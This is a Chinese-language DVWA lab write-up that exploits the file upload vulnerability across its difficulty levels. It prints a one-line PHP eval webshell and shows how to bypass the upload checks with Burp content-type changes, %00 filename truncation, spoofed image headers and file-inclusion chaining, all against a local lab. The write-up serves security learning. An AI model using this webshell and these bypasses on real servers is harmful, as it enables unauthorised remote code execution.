本系列文集:DVWA学习笔记

文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查，使得攻击者可以通过上传木马获取服务器的webshell权限，因此文件上传漏洞带来的危害常常是毁灭性的。

Low：

clipboard.png

函数介绍：
basename()函数返回路径中的文件名部分。
string basename ( string $path [, string $suffix ] )

参数介绍：
$path:必需。规定要检查的路径。在Windows中，斜线（/）和反斜线（\）都可以用作目录分隔符。在其它环境下是斜线（/）。
$suffix:可选。规定文件扩展名。如果文件有suffix，则不会输出这个扩展名。

举例：
<?php $path = "/testweb/home.php"; //显示带有文件扩展名的文件名 echo basename($path); //显示不带有文件扩展名的文件名 echo basename($path,".php"); ?>

输出：
home.php home

文件上传漏洞的利用的条件：
 1.能够成功上传木马文件
 2.上传文件必须能够被执行
 3.上传文件的路径必须可知

漏洞利用
因为对于上面的利用条件全都满足，直接上传文件x.php（一句话木马）
<?php @eval($_POST['x']);?>

clipboard (1).png

上传成功得到路径：
http://127.0.0.1/DVWA-1.9/hackable/uploads/x.php 密码为_POST['x']中的x
菜刀连接：就可以操控文件夹，干坏事了

clipboard (2).png

clipboard (3).png

Medium：

clipboard (4).png

分析：
Medium的代码对上传文件的类型、大小做了限制，要求文件类型必须是jpeg或者png，大小不能超过 100000B（约为 97.6KB）
普通上传一个php文件时，出现报错提示：

clipboard (5).png

漏洞利用
1.抓包修改文件类型
上传x.png文件，使用Burpsuite抓包:

clipboard (6).png

clipboard (7).png

clipboard (8).png

上传成功：

clipboard (10).png

上传后成功得到x.php文件：

clipboard (9).png

菜刀连接：http://127.0.0.1/hackable/uploads/x.php
2.%00 截断上传绕过
在php版本小于 5.3.4 的服务器中，当magic_quote_gpc选项为off时，可以在文件名中使用%00截断，所以可以把上传文件命名为x.php%00.png。

180320195942.png

180320195412.png

服务器会认为其文件名为x.php，顺势解析为php文件。
菜刀连接：http://127.0.0.1/hackable/uploads/x.php%00.png

180320184800.png

3.文件上传+文件包含
因为采用的是一句话木马，所以文件大小符合要求，至于文件类型的检查，尝试修改文件名为x.png，上传成功：

180320101057.png

但不能解析识别出是PHP文件，菜刀连接报错。
此时我们想到文件包含漏洞的利用。这里可以借助Medium 的文件包含漏洞来获取webshell权限，利用方式如下：
本地文件包含：成功读取x.png文件内容
http://127.0.0.1/vulnerabilities/fi/?page=D:/phpStudy/PHPTutorial/WWW/hackable/uploads/x.png
远程文件包含：
http://127.0.0.1/vulnerabilities/fi/?page=hthttp://tp://127.0.0.1/hackable/uploads/x.png
成功获取webshell权限：

180320184800 (1).png

adandinclude.png

High：

clipboard (11).png

strrpos()函数：

strrpos(string,find,start)

函数返回字符串find在另一字符串string中最后一次出现的位置，如果没有找到字符串则返回false，可选参数start规定在何处开始搜索。

strtolower()函数：

strtolower(string)

把字符串转换为小写。

getimagesize()函数：

getimagesize(string filename)

getimagesize()函数用于获取图像大小及相关信息，成功则返回一个数组，失败则返回FALSE并产生一条E_WARNING级的错误信息。

函数详细参考：
PHP strrpos() 函数
PHP getimagesize 函数
分析：
High的代码读取文件名中最后一个”.”后的字符串，通过文件名来限制文件类型因此要求上传文件名形式必须是.jpg、.jpeg 、*.png三者之一。getimagesize()函数更是限制了上传文件的文件头必须为图像类型。
Exploit
利用思路主要是：绕过getimagesize()函数检测识别和上传文件名的检测识别
让getimagesize()函数检测无效的方法：文件头欺骗，继而使得getimagesize()函数无法判断。

文件头相关的知识：

常见的图片格式的文件头标识如下：
JPEG/JPG - 文件头标识 (2 bytes): FF D8 (SOI) (JPEG 文件标识) - 文件结束标识 (2 bytes): FF D9 (EOI) 

PNG - 文件头标识 (8 bytes) :  89 50 4E 47 0D 0A 1A 0A

GIF - 文件头标识 (6 bytes) :  47 49 46 38 39(37) 61 

更多文件头标识参见文章：通过文件头标识判断图片格式

文件头欺骗：伪造文件头，使文件头标识一样，其它部分我们修改为一句话木马，也就成了我们常说的图片一句话。

常见的图片一句话制作方法：
先用C32Asm十六进制模式打开y.png，然后将x.php拖入，然后另存为z.png

180320220559.png

<?php

header("Content-type: text/html; charset=utf-8"); 

echo "y.png:";

$array0 = getimagesize("images/y.png");
print_r($array0);

echo "<br />";

echo "copy 命令制作的图片一句话 z1.png:";

$array1 = getimagesize("images/z1.png");
print_r($array1);

echo "C32Asm 制作的图片一句话 z2.png:";

$array2 = getimagesize("images/z2.png");
print_r($array2);
?>

以上是打印输出的file.php文件。

180321075814.png

我们发现得到的数组内容没有丝毫改变，
从而证明了该方法可以绕过getimagesize()函数的检测识别。接着我们再来进行利用：

1.%00 截断上传绕过
采用%00截断的方法可以轻松绕过文件名的检查，采用刚才的图片一句话进行上传。（适用于php小于 5.3.4 版本）
菜刀连接：http://127.0.0.1/hackable/uploads/z.php%00.png

2.文件上传 + 文件包含
通过上传图片一句话和借助High的文件包含漏洞来进行利用：
菜刀连接：
http://127.0.0.1/vulnerabilities/fi/?page=file:///D:/phpStudy/PHPTutorial/WWW/hackable/uploads/z.png